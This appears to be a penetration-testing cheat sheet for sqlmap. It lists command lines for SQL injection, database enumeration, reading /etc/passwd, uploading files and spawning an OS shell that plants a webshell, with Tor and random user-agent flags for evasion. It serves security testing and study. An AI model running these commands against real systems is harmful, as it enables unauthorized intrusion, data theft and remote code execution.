sqlmap
Verbose Level (-v)
0: displays critical info only
1: displays warning info
2: displays debug info
3: displays payload used
4: displays HTTP request body
5: displays HTTP response headers
6: displays HTTP response body
Database Connection (-d)
Connect to a database with credential:
sqlmap -d DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/<MySQL/Oracle/Microsoft SQL Server/PostgreSQL>
or connect to a database file:
sqlmap -d DBMS://<SQLite, Microsoft Access, Firebird>
GET (-u)
sqlmap -u "http://<domain>/vuln.php?id=1" -f --banner --dbs --users
POST (--data)
sqlmap -u "http://<domain>/vuln.php" --data="id=1" -f --banner --dbs --users
Load Request from a File (-r)
sqlmap -r <request_from_burp>
Cookie (--cookie)
sqlmap -u <url> --cookie <cookie>
User-Agent (--user-agent)
The default User-Agent
header sent by sqlmap is sqlmap/1.0-dev-xxxxxxx
, but we can specify an User-Agent
header:
sqlmap -u <url> --user-agent=<user_agent> -f --banner --dbs --users
or set a random user agent:
sqlmap -u <url> --random-agent -f --banner --dbs --users
Level (--level)
--level=1
: default mode--level=2
: adds cookie testing--level=3
: adds User-Agent testing--level=4
: more testing--level=5
: adds Host testing
Risk (--risk)
--risk=1
: (Default) innocuous injections--risk=2
: Enables heavy time-based injections--risk=3
: Enables OR-based injections -> using them on UPDATE queries would update all the rows in a table
Proxy (--proxy) and Tor (--tor)
Proxy:
sqlmap --proxy <proxy> -u <url> -f --banner --dbs --users
Tor:
sqlmap --tor -u <url> -f --banner --dbs --users
Blind SQLi (--string, --not-string)
Append to
--string
a string which is always present inTrue
output pageAppend to
--not-string
a string which is always present inFalse
output page
Privilege Enumeration (--is-dba)
Determine if the current user is the database admin:
sqlmap -u <url> --is-dba
Download/Upload (--file-read/--file-write/--file-dest)
Download a file:
sqlmap -u <url> --file-read /etc/passwd
Uploads a file:
sqlmap -u <url> --file-write <local_file> --file-dest <target_machine_directory>
RCE (--os-shell)
The following requirements must be satisfied for --os-shell
to work:
We have write permission
Pathnames are default
PHP
magic_quotes_gpc
is disabled
sqlmap -u <url> --os-shell
Behind the scene, sqlmap creates an "upload trojan" on the target machine and uploads a webshell from here.
If the -d
option is used, sqlmap will use UDF. For example:
sqlmap -d "mysql://<username>:<password>@<ip>:3306/dedecms" --os-shell
Last updated
Was this helpful?